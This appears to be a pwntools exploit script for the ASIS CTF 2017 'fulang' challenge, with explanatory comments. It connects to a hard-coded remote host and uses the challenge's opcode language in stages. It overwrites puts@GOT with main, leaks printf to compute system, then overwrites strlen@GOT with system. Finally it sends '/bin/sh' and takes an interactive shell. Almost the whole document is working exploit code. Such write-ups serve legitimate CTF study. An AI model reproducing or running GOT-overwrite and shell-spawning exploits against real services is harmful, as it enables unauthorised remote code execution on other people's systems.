phieulang1993

asis2017_fulang.py

Apr 9th, 2017
  1. from pwn import *
  2. import sys
  3.  
def decrease_address():
    """Return the two-character ':<' opcode (the author's "decrease address" op)."""
    opcode = ":<"
    return opcode
def increase_address():
    """Return the two-character ':>' opcode (the author's "increase address" op)."""
    opcode = ":>"
    return opcode
def decrease_value():
    """Return the two-character ':-' opcode (the author's "decrease value" op)."""
    opcode = ":-"
    return opcode
def increase_value():
    """Return the two-character ':+' opcode (the author's "increase value" op)."""
    opcode = ":+"
    return opcode
def put_value():
    """Return the two-character '::' opcode (the author's "put value" op)."""
    opcode = "::"
    return opcode
def set_value():
    """Return the two-character ':.' opcode (the author's "set value" op)."""
    opcode = ":."
    return opcode
def xor_value():
    """Return the two-character ':_' opcode (the author's "xor value" op)."""
    opcode = ":_"
    return opcode
  18.    
  19.  
# Exploit driver for the ASIS CTF 2017 "fulang" challenge (per the paste
# title).  The challenge binary is not on this page: the opcode helpers above
# and the three addresses below are specific to that binary and their meaning
# is taken from the author's own stage comments.  Python 2 syntax throughout
# (print statement, str-typed socket reads).
HOST = '69.90.132.40'
PORT = 4001
r = remote(HOST,PORT)

# Absolute 0x0804xxxx addresses, i.e. the author assumes a non-PIE 32-bit
# binary.  NOTE(review): what `data` and `fu` point at is inferred from the
# stage comments below (a data buffer and a cursor/"fu" location); verify
# against the binary.
data = 0x0804A080
fu = 0x0804A060
main = 0x080486DE

# stage 1: overwrite puts_got => main
# Each stage sends the same prefix: (data - fu) copies of the "decrease
# address" opcode, presumably stepping a write cursor from `data` down to
# `fu`, followed by one opcode per target byte.  The single-byte send after
# the payload is the low byte of the GOT slot being addressed (author's
# comment), and the p32() send is the 4-byte value written there.
r.recvuntil("Enter your code:")
payload = decrease_address()*(data-fu)
payload += set_value()
payload += set_value()
payload += increase_address()+set_value()
payload += increase_address()+set_value()
payload += increase_address()+set_value()
r.sendline(payload)
r.send("\x1C") # puts@plt 0x0804A01C
r.send(p32(main))
r.recvuntil("Enter your code:")

# stage 2: leak printf => find system address
# Same prefix, but "put value" opcodes make the program emit the 4 bytes at
# the selected slot instead of writing them.
payload = decrease_address()*(data-fu)
payload += set_value()
payload += put_value()
payload += increase_address()+put_value()
payload += increase_address()+put_value()
payload += increase_address()+put_value()
r.sendline(payload)
r.send("\x0C") # printf_got
# Collect exactly 4 bytes, one recv() at a time, pausing 0.1 s between reads.
# Python 2 str, so `res` is a byte string that u32() can unpack.
res = ""
while 1:
    res += r.recv(1)
    if len(res)==4:
        break
    sleep(0.1)
printf = u32(res)
print hex(printf)
r.recvuntil("Enter your code:")
# Author-determined distance between printf and system in the remote libc;
# the libc build is not on this page, so this constant is only valid for
# the original challenge service.
offset_system = 59104
system = printf-offset_system
print hex(system)

# # stage 3: overwrite strlen => system
# Same write pattern as stage 1, now targeting the slot the author labels
# strlen@GOT and writing the computed system address.
payload = decrease_address()*(data-fu)
payload += set_value()
payload += set_value()
payload += increase_address()+set_value()
payload += increase_address()+set_value()
payload += increase_address()+set_value()
r.sendline(payload)
r.send("\x20") # strlen_got 0x804A020
r.send(p32(system))
r.recvuntil("Enter your code:")

# stage 4: input strlen("/bin/sh") => system("/bin/sh")
# The program's own strlen() call on the next input line now reaches the
# overwritten slot (per the author's comment).
r.sendline("/bin/sh\x00")

r.interactive()